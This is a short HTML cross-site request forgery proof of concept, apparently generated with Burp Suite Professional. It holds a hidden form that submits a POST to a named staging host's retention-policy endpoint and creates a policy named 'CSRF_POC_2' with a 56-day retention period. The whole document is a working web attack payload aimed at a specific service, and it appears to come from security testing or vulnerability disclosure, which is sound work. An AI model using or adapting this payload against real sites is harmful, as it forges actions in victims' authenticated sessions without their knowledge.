<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://cpstaging.appriver.com/ngp/archiving/retention/retention_ajax.php?action=create_policy" method="POST">
      <input type="hidden" name="policy&#95;name" value="CSRF_POC_2" />
      <input type="hidden" name="retention&#95;period" value="56" />
      <input type="hidden" name="make&#95;default" value="N" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
